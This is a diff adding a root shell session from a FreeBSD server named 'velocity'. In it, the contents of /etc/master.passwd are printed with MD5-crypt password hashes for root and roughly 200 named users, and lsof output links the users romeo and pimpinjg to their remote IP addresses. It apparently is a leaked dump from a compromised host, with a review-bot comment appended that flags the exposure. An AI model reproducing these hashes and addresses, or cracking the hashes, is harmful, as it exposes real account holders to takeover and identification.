+alexbb:*:1345:1345:User &:/home/alexbb:/usr/local/bin/bash
+psycoz:*:1346:1346:User &:/home/psycoz:/usr/local/bin/bash
+brex132:*:1347:1347:User &:/home/brex132:/usr/local/bin/bash
+romeo:*:1348:1348:User &:/home/romeo:/usr/local/bin/bash 	// Luv birdz
+pimpinjg:*:1349:1349:pimp:/home/pimpinjg:/usr/local/bin/bash	      xxx
+
+[root@velocity:/var/run]# cat /etc/master.passwd 
+# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
+#
+root:$1$1/uC7r58$sAPSn.PUGsvyFIu4mcOIF.:0:0::0:0:Charlie &:/root:/usr/local/bin/bash
+toor:$1$IuvLkk7/$FgGjVLe5lsy07I5kDUC/T0:0:0::0:0:Bourne-again Superuser:/root:
+daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
+operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
+bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
+tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
+kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
+games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
+news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
+man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
+sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
+smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
+mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
+bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
+proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
+_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
+_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
+uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
+pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
+www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
+nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
+nsc:$1$IeIWCi46$XUYbzB6VMUjyo3yVDocI20:1001:0::0:0:User &:/home/nsc:/bin/sh
+sysc:$1$hiSG4Zk5$DRLSxZFui5GLPwdZoHRXa/:1002:1002::0:0:User &:/home/sysc:/usr/local/bin/bash
+vividbreeze:$1$HHTt39fS$BpffLFLjdrdFhiYRiT/oH1:1003:1003::0:0:User &:/home/vividbreeze:/usr/local/bin/bash
+sharpie:$1$Z/fby1iX$U.ENzMwNSk.Ak1eEo8cdo1:1036:1036::0:0:User &:/home/sharpie:/usr/local/bin/bash
+cappy57:$1$8gQtMpSY$4g39UeywbkYfv4t.BC1T0.:1038:1038::0:0:User &:/home/cappy57:/usr/local/bin/bash
+zoo:$1$ikC.1RVM$vaW3geI2tKDiBuvM7/8H1/:1039:1039::0:0:User &:/home/zoo:/usr/local/bin/bash
+dark:$1$sGGpg4L4$HYL2DV2DDtJrlDCsIk1fD0:1041:1041::0:0:User &:/home/dark:/usr/local/bin/bash
+evino:$1$HDrVvLQn$D1cJvyXZzYWc71dnlB9jl.:1042:1042::0:0:User &:/home/evino:/usr/local/bin/bash
+dano30:$1$ilxeqeAX$1.xdaXswIvjWdH4Es8U1U1:1043:1043::0:0:User &:/home/dano30:/usr/local/bin/bash
+daali:$1$RIGXxrvu$loyclkpc.AmaZJ6z7RycD0:1044:1044::0:0:User &:/home/daali:/usr/local/bin/bash
+skit:$1$YwEZ2Gg3$Mm9v5oPJpRUj5WbHGfiYI.:1045:1045::0:0:User &:/home/skit:/usr/local/bin/bash
+l33t:$1$BuBrfoCp$YgayOH.nAWmkTT.kOi0340:1047:1047::0:0:User &:/home/l33t:/usr/local/bin/bash
+tlm:$1$8qySBjLd$UvMl1Qi37S6HzW5.fgugN.:1049:1049::0:0:User &:/home/tlm:/usr/local/bin/bash
+itzkorn:$1$WvELNoD3$FIKMODlyhN1RIxuNyM8gV0:1051:1051::0:0:User &:/home/itzkorn:/usr/local/bin/bash
+groove:$1$U.nL9FBx$mxac7bOw5AcjMobjytLqT.:1052:1052::0:0:User &:/home/groove:/usr/local/bin/bash
+en0prcv:$1$ml9.a1tV$4ysE/.CdLiEAYOtG6IzW2.:1054:1054::0:0:User &:/home/en0prcv:/usr/local/bin/bash
+poolboy:$1$A5NPQSxN$X./Geraa6C3fLjbGv2j9h.:1055:1055::0:0:User &:/home/poolboy:/usr/local/bin/bash
+bollox:$1$1CezJarC$OZn7O/jcjFQHzMxK80L0C0:1058:1058::0:0:User &:/home/bollox:/usr/local/bin/bash
+vamp:$1$OdDSbp3S$VEOws1l9o/qV0i6Y2xiHC1:1059:1059::0:0:User &:/home/vamp:/usr/local/bin/bash
+genosyde:$1$izdrjKv1$qyo9BMhEB0kCGUinWl/dr1:1060:1060::0:0:User &:/home/genosyde:/usr/local/bin/bash
+y2j:$1$bzHRbq3a$04iFxtmEVuPEXbClBbUIM.:1061:1061::0:0:User &:/home/y2j:/usr/local/bin/bash
+katsst:$1$XkKWd/C/$gu0Kf6fWZZylSX2kvZP0y/:1062:1062::0:0:User &:/home/katsst:/usr/local/bin/bash
+nexxtea:$1$qiplCuym$aOcIJrBN7.ahK8fRpc5F.1:1063:1063::0:0:User &:/home/nexxtea:/usr/local/bin/bash
+quinn:$1$WjY3BCta$pOR9R53lRcsn9uMHRj5mO.:1064:1064::0:0:User &:/home/quinn:/usr/local/bin/bash
+crash:$1$ptyaMrnL$LfpP.5IoEVl6ASBLrZ7sw0:1066:1066::0:0:User &:/home/crash:/usr/local/bin/bash
+safety:$1$IdkZ.lW5$31zeswPr/v9Gwn6qZTDt3.:1067:1067::0:0:User &:/home/safety:/usr/local/bin/bash
+crazyl:$1$b6KKD5V2$0X.DEpoT8dnAV.2tkkSSQ/:1069:1069::0:0:User &:/home/crazyl:/usr/local/bin/bash
+tarawa:$1$kogmLs28$TVHG.5aER1x3a/6fks6fv1:1071:1071::0:0:User &:/home/tarawa:/usr/local/bin/bash
+athemp:*LOCKED*$1$yNQrxvZa$ndX97oZnZ.P29pYdLUDUX1:1077:1077::0:0:User &:/home/athemp:/usr/local/bin/bash
+cazz1961:$1$tNbxmjSZ$0nG7YCqOLZZBu.rdFYNXg1:1087:1087::0:0:User &:/home/cazz1961:/usr/local/bin/bash
+vitalrbj:$1$obXp9UmW$ASCrtvpO6SSYxAtC9/BgN1:1088:1088::0:0:User &:/home/vitalrbj:/usr/local/bin/bash
+digitalman:$1$.uafD1mk$ZKCSAxQX05Bt8CR1vD0bI.:1090:1090::0:0:User &:/home/digitalman:/usr/local/bin/bash
+timgor:$1$fV/Hdpqj$2sjgaBZs6L4cWkD8coayp1:1096:1096::0:0:User &:/home/timgor:/usr/local/bin/bash
+techi3:$1$ynI1L3YX$lTwOx8CeuiBAbtCq2rXG2.:1098:1098::0:0:User &:/home/techi3:/usr/local/bin/bash
+apo:$1$lgsvmKYS$kJ/vrigrNVEXtw8V3qA3K/:1099:1099::0:0:User &:/home/apo:/usr/local/bin/bash
+blkgraz:$1$5q0v8Hnd$zACUwgVPinssVcu8I8Ouf0:1100:1100::0:0:User &:/home/blkgraz:/usr/local/bin/bash
+jamesn:$1$0ZLHnfT0$mF2GuCKO5WcYOceupFee0/:1101:1101::0:0:User &:/home/jamesn:/usr/local/bin/bash
+sacred:*LOCKED*$1$QBsL9qE8$9gAsuW0OK2OH2.UfBBD4n/:1103:1103::0:0:User &:/home/sacred:/usr/local/bin/bash
+jschultk:$1$Ghq0DYN4$XO2MmdjnPzIkQT0nWFNi.0:1104:1104::0:0:User &:/home/jschultk:/usr/local/bin/bash
+narcissu:$1$yPWcgSV9$K6b21WLz8VeolcK9x26mW1:1105:1105::0:0:User &:/home/narcissu:/usr/local/bin/bash
+neohax:$1$BYHxfesg$7Vu8ktsSVk6FGgSMczVQG.:1115:1115::0:0:User &:/home/neohax:/usr/local/bin/bash
+ceejay:*LOCKED*$1$sDhV37Ee$hKD5Ycjby19mEG3NYYIYo0:1119:1119::0:0:User &:/home/ceejay:/usr/local/bin/bash
+wolf:$1$.MGFDwFE$jy3l9ohTEH1ykRgpGM1Q6.:1126:1126::0:0:User &:/home/wolf:/usr/local/bin/bash
+warlordz:$1$uvxD1gWl$4fRmw..Z.wViXzw28Jlmu1:1129:1129::0:0:User &:/home/warlordz:/usr/local/bin/bash
+hh360:$1$BRAG0RtG$iXnTwrCohVK8HOGAJohy10:1130:1130::0:0:User &:/home/hh360:/usr/local/bin/bash
+simonbh:$1$97E2uBin$73LaITM/WELCrMAt682Z21:1133:1133::0:0:User &:/home/simonbh:/usr/local/bin/bash
+crazie:$1$myYGtQTs$U52cfuiCDyksyWJbM55dx.:1134:1134::0:0:User &:/home/crazie:/bin/tcsh
+burnt:$1$ykBWG.ZC$dfTn3m8koWfmAY1QHpx1R0:1136:1136::0:0:User &:/home/burnt:/usr/local/bin/bash
+xckx:*LOCKED*$1$7mjlMrC7$j/ZtDnWpTeAgxJl4jrPPV1:1139:1139::0:0:User &:/home/xckx:/bin/sh
+f3d0r:*LOCKED*$1$9K1FP6Bz$KDznsL2Eh9l3ljez.qoif/:1140:1140::0:0:User &:/home/f3d0r:/usr/local/bin/bash
+khicks:$1$VzHaJyrH$0m/NnKHiTrFY..8zhbaLq0:1145:1145::0:0:User &:/home/khicks:/usr/local/bin/bash
+schlomer:*LOCKED*$1$iBBpx5BZ$LjFBxe10UsUGETx8AZfiP0:1147:1147::0:0:User &:/home/schlomer:/usr/local/bin/bash
+nodex:$1$Q518nSu7$4WszHno7Bi4NymOySGq1a0:1153:1153::0:0:User &:/home/nodex:/usr/local/bin/bash
+crrj13:$1$m4PUs5Ia$3tsRV7DZyj3fLxjHK9.AX0:1155:1155::0:0:User &:/home/crrj13:/usr/local/bin/bash
+dravas:$1$hTXK1nl7$0WoSi2Md.l7h/eM2uQCp5.:1157:1157::0:0:User &:/home/dravas:/usr/local/bin/bash
+sinistro:$1$rt7kcwvQ$xe2ixfObxehOHLzoILyVF.:1170:1170::0:0:User &:/home/sinistro:/usr/local/bin/bash
+izedd:*LOCKED*$1$D5UKCjr0$e9soJXXTyUG1Xf5eHHDuZ/:1172:1172::0:0:User &:/home/izedd:/usr/local/bin/bash
+chevym4n:$1$K1uoGWl/$rZLwDgLIgr.Xni315uVpX.:1174:1174::0:0:User &:/home/chevym4n:/usr/local/bin/bash
+edgein:$1$2Vs.w9gS$mvylnKn4jxg6lsitAbz.i.:1175:1175::0:0:User &:/home/edgein:/usr/local/bin/bash
+shoes:$1$e.WxvF9e$UR5G4Q4zBbgMYaRcvKR3L/:1178:1178::0:0:User &:/home/shoes:/usr/local/bin/bash
+zenchi:$1$4YSeHXDW$0/Y40Q9iuLRgd0IJKQucc.:1179:1179::0:0:User &:/home/zenchi:/usr/local/bin/bash
+darien9:$1$vzP7ScLf$c/x7.w4a8hLqcy/cm.3uk1:1180:1180::0:0:User &:/home/darien9:/usr/local/bin/bash
+reaper90:*LOCKED*$1$RdwnqlVZ$u0yfgSk8FCTKkzDb.n3gM1:1181:1181::0:0:User &:/home/reaper90:/usr/local/bin/bash
+bnoel:$1$drKh3ET3$.V5pp0CrLCNjMiPuKJxnY1:1183:1183::0:0:User &:/home/bnoel:/usr/local/bin/bash
+hts:$1$84Ss/lv8$b51Gx1URnSeNK63ZO8kNZ1:1188:1188::0:0:User &:/home/hts:/usr/local/bin/bash
+hw4tbnc:$1$Vh3/g6US$cPnpGhNkNG9BWvCQ3t2Yz/:1190:1190::0:0:User &:/home/hw4tbnc:/usr/local/bin/bash
+xavi:$1$9xxNvzQF$drSUfEtQS.QXN1BbuSZAQ/:1192:1192::0:0:User &:/home/xavi:/usr/local/bin/bash
+kruapra:$1$Nbcjv9YC$N8ePQ6PSdQHF0U/DKkrkh0:1193:1193::0:0:User &:/home/kruapra:/usr/local/bin/bash
+bbblade1:$1$3QdkfReN$LAGYA1xhqAuhcTw0fJWsl0:1197:1197::0:0:User &:/home/bbblade1:/usr/local/bin/bash
+oby1:$1$GkQaLc30$6DXwEhSd9QSeDF5FjAVTB0:1198:1198::0:0:User &:/home/oby1:/usr/local/bin/bash
+ltootle:$1$QGrHDsUo$Wl.6N3Nm9ev1dK58x.e80/:1199:1199::0:0:User &:/home/ltootle:/usr/local/bin/bash
+zime:$1$uiS1oy.Q$WiVC7b9esN7u4IQw9qrsl0:1200:1200::0:0:User &:/home/zime:/usr/local/bin/bash
+ksafusi:$1$hEuXZPjD$AxW7YdBYaTfraRpTuLhhs.:1202:1202::0:0:User &:/home/ksafusi:/usr/local/bin/bash
+methanl:$1$DDefrWsW$uVtJKR20EYhnrGhL2lgAM0:1205:1205::0:0:User &:/home/methanl:/usr/local/bin/bash
+anux:$1$MjMKgFJP$Db/H.GWM0F4V8y6aESFx9/:1206:1206::0:0:User &:/home/anux:/usr/local/bin/bash
+tea:$1$XsdcVMWd$6zKH0gChUzxwFW9JWohhU0:1207:1207::0:0:User &:/home/tea:/usr/local/bin/bash
+ircjaymz:$1$OQn.DXif$.CQTkWt2WMacpsLiIzTFN/:1210:1210::0:0:User &:/home/ircjaymz:/usr/local/bin/bash
+coolcat:$1$Oylm8zdT$1fJ9FuOxsLixvN0Mvi7gv1:1211:1211::0:0:User &:/home/coolcat:/usr/local/bin/bash
+zeepysea:$1$3eGKEHR9$zOgqVHLQHdZVHWxVuNJZG0:1213:1213::0:0:User &:/home/zeepysea:/usr/local/bin/bash
+darkevil:$1$45g22hpl$DdFBwycNzL3o9D./PKHzf1:1214:1214::0:0:User &:/home/darkevil:/usr/local/bin/bash
+grindey:$1$.Y3kkIHc$kKp8DefYIdeekSzixAV4f0:1215:1215::0:0:User &:/home/grindey:/usr/local/bin/bash
+silver15:$1$tb0VvKDF$c0SYfPvgceRpkYvTeLE43/:1216:1216::0:0:User &:/home/silver15:/usr/local/bin/bash
+smash:$1$jNnzzwU.$p5P3qiiQdK8fh22y8pM2k.:1218:1218::0:0:User &:/home/smash:/usr/local/bin/bash
+reznik:$1$NB.AbeQB$woH82mNch0lgffXyGchAU/:1219:1219::0:0:User &:/home/reznik:/usr/local/bin/bash
+omelette:*LOCKED*$1$XN1bbL.7$oThuyRVmG09RvI02.4C1I0:1222:1222::0:0:User &:/home/omelette:/usr/local/bin/bash
+mimik0r:$1$0XSPv6Su$ZwaXxxlJYHS97/pdN0oy90:1223:1223::0:0:User &:/home/mimik0r:/usr/local/bin/bash
+owine:$1$wxGmMtzO$Z3thy5JIjzaffvKpPG9WI/:1224:1224::0:0:User &:/home/owine:/usr/local/bin/bash
+manboo:$1$N2gCSmE3$yk.dcCPMq6Y1/ezAac7wu0:1225:1225::0:0:User &:/home/manboo:/usr/local/bin/bash
+corley:$1$PvKjpEEr$Vo37apBxJ3eqZqB8OLfaT.:1231:1231::0:0:User &:/home/corley:/usr/local/bin/bash
+sqd:$1$OZvYdPVR$FmfB6RtJAzTp1oGmdMCCp1:1233:1233::0:0:User &:/home/sqd:/usr/local/bin/bash
+mooo:$1$zEP5oqSf$UbHTr1.JzIn0ey0.DAGn21:1234:1234::0:0:User &:/home/mooo:/usr/local/bin/bash
+comedy:$1$z6LpAT1A$nc1/vuEvWdaP/cLqkowCs.:1235:1235::0:0:User &:/home/comedy:/usr/local/bin/bash
+lynx:$1$se6yc6Bo$.LQ7e0Q01u3rYovysJR3h1:1236:1236::0:0:User &:/home/lynx:/usr/local/bin/bash
+prodigy:$1$RVyb9n7n$.xCux6MDqOIdqJ0st2KOb1:1237:1237::0:0:User &:/home/prodigy:/usr/local/bin/bash
+chrirc:$1$2JCsvlHc$i/CQOaTf5gEpM7oFCjDN/.:1238:1238::0:0:User &:/home/chrirc:/usr/local/bin/bash
+lyhne1:$1$Kpsj2jtT$sjUGo/h4J2FIkuoqishrw/:1242:1242::0:0:User &:/home/lyhne1:/usr/local/bin/bash
+percott1:$1$BjzcMqbu$i3/MQucqGMtCREAcP7W65.:1243:1243::0:0:User &:/home/percott1:/usr/local/bin/bash
+djspark:$1$c6xQdKTb$mWggScCvJZiwkdnzpx/Cp/:1244:1244::0:0:User &:/home/djspark:/usr/local/bin/bash
+ac1115:$1$XsglBGxw$DyTzTnNO0mOsflnamAukf0:1246:1246::0:0:User &:/home/ac1115:/usr/local/bin/bash
+asriel:$1$VbcBqSUx$JEQvA2lwRWPqk.0w11oes/:1247:1247::0:0:User &:/home/asriel:/usr/local/bin/bash
+devil:$1$q6WNzUIk$/Qv4J3E.fbG/JE4j.hHAL/:1248:1248::0:0:User &:/home/devil:/usr/local/bin/bash
+lymelyte:$1$nqTvcQub$visWqXp3cKGDkwc25KYNl0:1249:1249::0:0:User &:/home/lymelyte:/usr/local/bin/bash
+cmm:$1$ekGdXp0j$hUyJVyP3UXWhCOHVtCq/N1:1250:1250::0:0:User &:/home/cmm:/usr/local/bin/bash
+nek0o:$1$PUmJEvpa$ZrIV7QV6Qf3GJn5cEOTIu0:1252:1252::0:0:User &:/home/nek0o:/usr/local/bin/bash
+baxxta:$1$apBmnTij$hZw5VnHaUpHlSuOIYNfD20:1253:1253::0:0:User &:/home/baxxta:/usr/local/bin/bash
+bruhaha:$1$HH2GgFl4$cmXD/bE438EiLmIbJyqdR1:1254:1254::0:0:User &:/home/bruhaha:/usr/local/bin/bash
+dv327:$1$MDTcfoUl$154clLyjNZI4qgtQzyrDq/:1258:1258::0:0:User &:/home/dv327:/usr/local/bin/bash
+voxitize:$1$DWOR6B.M$ppBHJaNOS4LvRrOhbphX2/:1261:1261::0:0:User &:/home/voxitize:/usr/local/bin/bash
+own3d:$1$kCOJh8SJ$KwEe1bJ8e.JS3Nm.xwYb10:1262:1262::0:0:User &:/home/own3d:/usr/local/bin/bash
+feed:$1$RHeHyv6H$v1cnIn1fKUwC9k.got3dl.:1264:1264::0:0:User &:/home/feed:/usr/local/bin/bash
+yaquis:$1$68F1SID1$b9H5Bbj/fNYsvUhqgpr9Q1:1266:1266::0:0:User &:/home/yaquis:/usr/local/bin/bash
+bpunux:$1$SqaNE5JP$bp1vJn3I4Rr6oZ6eJAmvz0:1269:1269::0:0:User &:/home/bpunux:/usr/local/bin/bash
+skypilot:$1$0iDevIYV$Oi53AE7YFrB6AaBnAfcn7.:1271:1271::0:0:User &:/home/skypilot:/usr/local/bin/bash
+blake96:$1$KwitdaYi$2EyIIukI8gEIxZCHwwj4U.:1272:1272::0:0:User &:/home/blake96:/usr/local/bin/bash
+blotch:$1$rYr2mFcV$HPpQFgQacg4ScPjvNfYR31:1274:1274::0:0:User &:/home/blotch:/usr/local/bin/bash
+scouse:$1$du5wftbl$lVamWsT/nEKT75D/IelEI/:1275:1275::0:0:User &:/home/scouse:/usr/local/bin/bash
+mogle3:$1$Fo7FY4Sw$ioqHiMhZ/8BBDZjg39BR41:1276:1276::0:0:User &:/home/mogle3:/usr/local/bin/bash
+ste:$1$H4hxohFI$se6RPLcCpkl/LY4aUiov6.:1277:1277::0:0:User &:/home/ste:/usr/local/bin/bash
+omgwtf:$1$eK9d4q9r$eCZMCR.GRqmt6oOhrbam11:1281:1281::0:0:User &:/home/omgwtf:/usr/local/bin/bash
+brosb4:$1$NQd5q63M$62LY3LnPxuPbrBmTANOkm1:1283:1283::0:0:User &:/home/brosb4:/usr/local/bin/bash
+mindben:$1$xrm2x1nF$DnA.Wkg4q9ImdLOA75IT00:1284:1284::0:0:User &:/home/mindben:/usr/local/bin/bash
+hixk:$1$p2dRk8OC$XpC/2o0jwotue0Tmbdr3R0:1286:1286::0:0:User &:/home/hixk:/usr/local/bin/bash
+omen:$1$eT86NXcE$.ouer9/Fp/lv04NAhli5a1:1287:1287::0:0:User &:/home/omen:/usr/local/bin/bash
+sakik1:$1$PujiBsEC$Syl3nyJzAObvu2UcpfbVd/:1290:1290::0:0:User &:/home/sakik1:/usr/local/bin/bash
+chriys:$1$R0.IBcw2$VILPHOKDvQts2eyy6ndoK0:1291:1291::0:0:User &:/home/chriys:/usr/local/bin/bash
+jtracy:$1$RxPgmSPJ$/O7J8PYHUMZHIx/4hJ0XE0:1292:1292::0:0:User &:/home/jtracy:/usr/local/bin/bash
+roodyk:$1$0Bo4ZY89$ray17Ga4HpE2QtaFiHOg11:1293:1293::0:0:User &:/home/roodyk:/usr/local/bin/bash
+qfx:$1$miBfwHok$ODKoxjFkZSYxfQqzQX96A1:1295:1295::0:0:User &:/home/qfx:/usr/local/bin/bash
+chrisdad:$1$hurRNkwG$V8PUznOwFheCuU6TCWic4.:1296:1296::0:0:User &:/home/chrisdad:/usr/local/bin/bash
+rice21:$1$nB9dgK9c$XmTcPL/ig7xDxT1iIbY4..:1298:1298::0:0:User &:/home/rice21:/usr/local/bin/bash
+wchan21:$1$Ia3.DKEB$oTtcBvRdagIb59HbVfc3l0:1299:1299::0:0:User &:/home/wchan21:/usr/local/bin/bash
+xkelsx:$1$iWNCktLQ$F37FwcA8XlJuiSk0RqB1p1:1300:1300::0:0:User &:/home/xkelsx:/usr/local/bin/bash
+jerryste:$1$lUhhapJy$Hi6dQ4ToW6xAPMjfK5bBS1:1302:1302::0:0:User &:/home/jerryste:/usr/local/bin/bash
+pbx:$1$Ln.hfEBz$k/Q1E0leCS9T.gLaPPpBA.:1303:1303::0:0:User &:/home/pbx:/usr/local/bin/bash
+mlh:$1$9kndvAsu$/kIT6xRBCsb8nf8.m0kPV.:1307:1307::0:0:User &:/home/mlh:/usr/local/bin/bash
+howell1:$1$Vtbi5SB.$w6W4pZ/Pc/TfPA0y0jod4/:1308:1308::0:0:User &:/home/howell1:/usr/local/bin/bash
+djkarl:$1$aEJTRbAG$3eWTZQ4CgwGbHbAfHHl4P.:1309:1309::0:0:User &:/home/djkarl:/usr/local/bin/bash
+subkult:$1$2QPeEVKb$bCL0KYncuAGfIO4FKWW3N1:1310:1310::0:0:User &:/home/subkult:/usr/local/bin/bash
+dealer:$1$mITFxoNU$lJtxGqUo2K4rE6/PYLYCg/:1311:1311::0:0:User &:/home/dealer:/bin/sh
+cont:$1$Hl1DCBfm$HO43dbNlGn6TZvo/F2zTH0:1312:1312::0:0:User &:/home/cont:/usr/local/bin/bash
+ircusr:$1$X1181Xd3$524I5czvIWxCkduxRuKhk1:1313:1313::0:0:User &:/home/ircusr:/usr/local/bin/bash
+lordy:$1$y5CwHmRO$PZRJ/aY7BtMqY9FagatZR1:1314:1314::0:0:User &:/home/lordy:/usr/local/bin/bash
+chozen1:$1$qc4UoXsN$U/YTbetNKaZ/RwEYpWOdP1:1315:1315::0:0:User &:/home/chozen1:/usr/local/bin/bash
+nardi:$1$ttRgdp5X$kq1Gb/4FPSmGdbiYBEwt1/:1316:1316::0:0:User &:/home/nardi:/usr/local/bin/bash
+ssaws:*LOCKED*$1$.qT8FvGI$l60rRjSoGgG699wR51Ie/0:1317:1317::0:0:User &:/home/ssaws:/usr/local/bin/bash
+chaos1:$1$hgGtAmCk$BzvUVeU8f38CKZPr4CcZ/1:1318:1318::0:0:User &:/home/chaos1:/usr/local/bin/bash
+jax66:$1$4TWJjUIH$Pm/erJRmRgc01FCVakDfB.:1319:1319::0:0:User &:/home/jax66:/usr/local/bin/bash
+paleride:$1$ahPjbJV5$g63Rwng/2D9rKeK0bIwdx.:1320:1320::0:0:User &:/home/paleride:/usr/local/bin/bash
+kokoryu:$1$NVQwZzru$VjR4eW9CGrT.YF6nh72Ke0:1321:1321::0:0:User &:/home/kokoryu:/usr/local/bin/bash
+bluewish:$1$rQtdB28x$5bGykkOQ8gr5lx1qHYlRs1:1322:1322::0:0:User &:/home/bluewish:/usr/local/bin/bash
+grumpy:$1$o.biiCj3$5AG9SpDJjbNUSSnnJ92uc.:1323:1323::0:0:User &:/home/grumpy:/usr/local/bin/bash
+jaiven:$1$y.IDqqL3$u7netp1tGxbhjKfbd6XTO0:1324:1324::0:0:jusam69:/home/jaiven:/usr/local/bin/bash
+rikt:$1$Fjry.jO8$9hNprEmsN9GLULLeZvb.o1:1325:1325::0:0:User &:/home/rikt:/usr/local/bin/bash
+sal:$1$AuSJnmDL$YSdEP0KfVzRRVCiyhnnhj.:1326:1326::0:0:User &:/home/sal:/usr/local/bin/bash
+lailoke:$1$EC6X0Zz.$DdVRj0ju8ua4DKMFCAFUo/:1327:1327::0:0:User &:/home/lailoke:/usr/local/bin/bash
+kingzy:$1$qm46wwsJ$QNk/qT5dDS2bXr87qZpMi0:1328:1328::0:0:User &:/home/kingzy:/usr/local/bin/bash
+delion1:$1$awK8R.nN$0GCL5dcuK1cirjfudAqHY0:1329:1329::0:0:User &:/home/delion1:/usr/local/bin/bash
+vietnigh:$1$FdwjedVt$tmUPUlfiHYr/bTUivlFn01:1330:1330::0:0:User &:/home/vietnigh:/usr/local/bin/bash
+darkuno3:$1$L9VYcl3k$mIQ9ahiFi0Sy0Oc8re8TM0:1331:1331::0:0:User &:/home/darkuno3:/usr/local/bin/bash
+mae21:$1$aVUu0DTg$jvYomCsK1cewfLWHurOlv0:1332:1332::0:0:User &:/home/mae21:/usr/local/bin/bash
+redrum:$1$WFOWXv8b$Rqxxha5.d8WjszhU0AKXC.:1333:1333::0:0:User &:/home/redrum:/usr/local/bin/bash
+cpu:$1$tjEDjNz1$e6.aktoZ6oizYft1eyXMp.:1334:1334::0:0:User &:/home/cpu:/usr/local/bin/bash
+cassand:$1$hZgXLQbv$uE7b8oM88z9qjqhFwka7X/:1335:1335::0:0:User &:/home/cassand:/usr/local/bin/bash
+nyakz:$1$yGPbLpHT$cIcqvBVPmI6fjG9cilKu7/:1336:1336::0:0:User &:/home/nyakz:/usr/local/bin/bash
+ioplex:$1$FSJ1qmmR$zFt5TGcDNeAQOcWCiWQZq0:1337:1337::0:0:User &:/home/ioplex:/usr/local/bin/bash
+dasboot:$1$PgS728fU$IfecoKOgPjuVFep1GIesx.:1338:1338::0:0:User &:/home/dasboot:/usr/local/bin/bash
+visage:$1$jGAd8QtY$Fi4fFEemJYjj0/gu9oDDc1:1339:1339::0:0:User &:/home/visage:/usr/local/bin/bash
+brosco:$1$kpHOwub.$2odvLK5iEXASTkwbcuilY0:1340:1340::0:0:User &:/home/brosco:/usr/local/bin/bash
+mrts:$1$f8026tqY$cxdY57bGxA11PdflJBaET/:1341:1341::0:0:User &:/home/mrts:/usr/local/bin/bash
+qberto:$1$qprEj3J4$VzXPUlgGqiKKlZIml3M8y/:1342:1342::0:0:User &:/home/qberto:/usr/local/bin/bash
+kooner:$1$Kl19GSGx$ZjpFwBynWbIT40iEkCfxg/:1343:1343::0:0:User &:/home/kooner:/usr/local/bin/bash
+matt:$1$Mj6LerXV$SnwLvGTJI5hQbZLi7ho96/:1344:1344::0:0:User &:/home/matt:/usr/local/bin/bash
+alexbb:$1$6LLUjutX$OiYpyvVAi60xC2sFVA4OP0:1345:1345::0:0:User &:/home/alexbb:/usr/local/bin/bash
+psycoz:$1$UgwFHV0f$4/V6NqEuYTJL2GwpfwjYb.:1346:1346::0:0:User &:/home/psycoz:/usr/local/bin/bash
+brex132:$1$lhno75FQ$L5fsLgcdEObDqCp55rkQn/:1347:1347::0:0:User &:/home/brex132:/usr/local/bin/bash
+romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
+pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
+[root@velocity:/var/run]# 
+
+[root@velocity:/]# cat /etc/master.passwd | grep romeo
+romeo:$1$ekIx6D6b$coKlSvt01Xe8jfDaK7e5A1:1348:1348::0:0:User &:/home/romeo:/usr/local/bin/bash
+[root@velocity:/]# cat /etc/master.passwd | grep pimpinjg
+pimpinjg:$1$6gpJ9Bk3$/lYnWkgoGwYBXOIR4ff581:1349:1349::0:0:pimp:/home/pimpinjg:/usr/local/bin/bash
+
+
+[root@velocity:/]# lsof -i -n | grep romeo
+irssi     32525      romeo    3u  IPv4 0xcc67d000      0t0  TCP 72.20.28.205:53881->71.6.199.68:ircd (ESTABLISHED)
+irssi     32525      romeo    4u  IPv4 0xc9254740      0t0  TCP 72.20.28.205:53882->66.225.223.70:ircd (ESTABLISHED)
+irssi     32525      romeo    5u  IPv4 0xc9c76cb0      0t0  TCP 72.20.28.205:53883->94.102.58.212:ircd (ESTABLISHED)
+irssi     32525      romeo   20u  IPv4 0xc5bf1ae0      0t0  TCP 72.20.28.205:54464->67.203.77.67:ircd (ESTABLISHED)
+sshd      83595      romeo    3u  IPv4 0xc58a23a0      0t0  TCP 72.20.28.248:ssh->188.50.41.73:56764 (ESTABLISHED)
+[root@velocity:/]# lsof -i -n | grep pimpinjg
+sshd      82325   pimpinjg    3u  IPv4 0xc5480000      0t0  TCP 72.20.28.248:ssh->76.175.20.182:55028 (ESTABLISHED)
+
+
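Review bot: the added lines above commit what the transcript shows as `/etc/master.passwd` content, with each account name next to its `$1$` (MD5-crypt) password hash, and the `lsof -i -n` output ties the romeo and pimpinjg accounts to specific remote addresses. MD5-crypt is an obsolete scheme that is cheap to attack offline, so publishing these entries in a mirror repository amounts to publishing credentials for any account whose owner reused the password. Suggest replacing the hash field with a fixed placeholder and masking the address and host columns, here and in the `last` listing that follows, before this file is imported, and noting in README.md that the mirrored text is sanitized.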
+[root@velocity:~]# last
+katsst           ttyp2    adsl-76-240-177- Tue Jun 23 18:34 - 19:04  (00:30)
